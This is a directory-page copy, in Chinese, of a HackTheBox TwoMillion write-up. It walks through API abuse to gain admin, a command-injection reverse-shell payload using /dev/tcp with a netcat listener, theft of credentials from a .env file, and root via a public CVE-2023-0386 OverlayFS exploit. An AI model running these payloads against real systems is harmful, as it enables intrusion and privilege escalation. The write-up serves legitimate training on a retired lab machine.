Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
HTB-TwoMillion-Writeup — HackTheBox TwoMillion 机器破解报告 — API滥用、命令注入与CVE-2023-0386 | Kitploit
工具/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
权限提升侦察漏洞分析漏洞利用横向移动Web应用程序漏洞利用后渗透利用CTF渗透测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
命令与控制
学习与教育
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

HackTheBox TwoMillion 机器破解报告 — API滥用、命令注入与CVE-2023-0386

查看仓库
4个月前尚未审核

HTB-TwoMillion-Writeup

HackTheBox TwoMillion 机器 Writeup — API滥用、命令注入与CVE-2023-0386

HackTheBox — TwoMillion Writeup

HackTheBox — TwoMillion Writeup

HTB Difficulty OS

机器信息

字段详情
名称TwoMillion
难度Easy
操作系统Linux
IP10.10.11.221
CVECVE-2023-0386

概述

TwoMillion 是一台 Easy 难度的 Linux 机器,主题围绕旧的 HackTheBox 平台。它涉及解码邀请码、滥用 API 端点、OS 命令注入、凭据发现以及通过 CVE-2023-0386 (OverlayFS) 进行 Linux 内核权限提升。


枚举

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

开放端口:

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → 重定向到 2million.htb

添加到 /etc/hosts:

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

步骤1 — 邀请码

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

响应是 ROT13 编码的。解码它:

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

生成邀请码:

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

使用解码后的邀请码在 http://2million.htb/register 注册。


步骤2 — API滥用 → 管理员

通过浏览器登录,从 cookie 中获取 PHPSESSID(F12 → Application → Cookies)。

提升为管理员:

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

验证:

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

步骤3 — 命令注入 → 反弹 Shell

启动监听器:

root@kitploit:~
nc -lvnp 4444

发送反弹 Shell 负载:

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

作为 www-data 收到 Shell。


步骤4 — 用户 Flag

在 .env 中找到凭据:

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

SSH 登录:

root@kitploit:~
ssh [email protected]
cat ~/user.txt

步骤5 — Root Flag (CVE-2023-0386)

检查提示:

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386

在 Kali 上下载并编译利用:

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

传输到目标:

root@kitploit:~
# Kali
python3 -m http.server 8000

# 目标
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

在目标上运行两个终端:

终端 1:

root@kitploit:~
./fuse ./ovlcap/lower ./gc

终端 2:

root@kitploit:~
./exp

获取 root flag:

root@kitploit:~
cat /root/root.txt

攻击链


使用的工具

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

本 Writeup 仅用于教育目的,针对已退役的 HackTheBox 机器。

下载工具
步骤
技术
侦察Nmap 扫描
邀请码ROT13 + Base64 解码
Web 权限提升API 操纵 → 管理员
初始 ShellOS 命令注入
横向移动.env 凭据 → SSH
RootCVE-2023-0386 OverlayFS 利用